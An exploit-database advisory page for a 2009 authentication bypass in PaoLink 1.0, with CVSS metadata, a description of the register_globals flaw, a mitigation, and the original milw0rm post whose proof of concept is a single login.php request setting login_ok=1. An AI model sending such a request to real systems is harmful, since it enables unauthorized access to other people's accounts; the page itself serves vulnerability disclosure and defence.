header-logo
Suggest Exploit
vendor:
PaoLink
by:
SirGod
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: PaoLink
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: No
Related CWE: N/A
CPE: a:paolink:paolink:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability

PaoLink 1.0 is vulnerable to an authentication bypass vulnerability due to the register_globals setting being set to 'on'. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the login.php page with the login_ok parameter set to '1'.

Mitigation:

Disable register_globals in the php.ini configuration file.
Source

Exploit-DB raw data:

#############################################################################
[+] PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#############################################################################

download : http://zenas.org/paobacheca/download/scarica.html

[+] Authentication Bypass Vulnerability


 - Notes : register_globals = on


 - PoC :

     http://127.0.0.1/[path]/login.php?login_ok=1

#############################################################################

# milw0rm.com [2009-07-28]

Navigation

Suggest Exploit

Services By CQR